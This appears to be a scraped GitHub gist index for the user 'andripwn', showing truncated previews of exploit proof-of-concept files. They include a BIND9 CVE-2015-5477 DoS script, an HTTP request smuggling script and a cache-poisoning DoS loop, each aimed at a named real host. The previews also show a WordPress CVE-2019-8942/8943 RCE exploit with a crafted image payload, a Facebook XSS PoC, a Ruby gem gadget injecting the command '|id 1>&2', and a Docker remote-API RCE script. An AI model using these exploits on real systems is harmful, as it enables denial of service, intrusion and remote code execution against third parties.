andripwn / poc.py
Created April 7, 2020 03:37
DoS of (smartsupp.com) via CVE-2015-5477 exploitation
#!/usr/bin/env python
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
andripwn / smuggling.jar
Created March 24, 2020 16:49
P-LOAD HTTP Request Smuggling
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
import re
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
andripwn / Cache-poisoning.sh
Last active September 26, 2020 17:14
Cache poisoning DoS to various aa-assets (#High Vulnerability)
#!/bin/bash
while true
do
printf 'GET /?cb=xxx HTTP/1.1\r\n'\
'Host: blanco-dev.eu2.frbit.net\r\n'\
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\
'Accept: */*\r\n'\
'Accept-Language: en-US,en;q=0.5\r\n'\
'Accept-Encoding: gzip, deflate\r\n'\
#!/bin/bash
#
# script for subdomain enumeration using four of the best tools, plus some APIs:
# * findomain: https://github.com/Edu4rdSHL/findomain
# * SubFinder: https://github.com/projectdiscovery/subfinder
# * Amass: https://github.com/OWASP/Amass
# * AssetFinder: https://github.com/tomnomnom/assetfinder
#
bold="\e[1m"
andripwn / wordpress-rce.js
Created March 16, 2020 15:53
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
andripwn / fb-xss-poc.html
Created March 12, 2020 17:03
iPhone app XSS in Facebook Mail
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
$(function(){
parse_messages = function()
{
$('.twoLines.preview>.snippet').each(function(index,value)
{
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');
andripwn / OTP.rb
Last active March 5, 2020 17:55
Universal OTP
#!/usr/bin/env ruby
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
andripwn / crawler.py
Created February 27, 2020 17:03
Tesla Crawler
import argparse
import requests
import logging
import pandas as pd
import time
logging.basicConfig()
logger = logging.getLogger('tesla-crawler')
logger.setLevel(logging.INFO)
andripwn / docker.py
Created February 26, 2020 16:08
console-put-rce
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable the Remote API with the following command:
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature; remember to filter port 2375.
#!/bin/bash
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RESET='\033[0m'
# install homebrew
echo -e "[-] ${GREEN}install homebrew...${RESET}"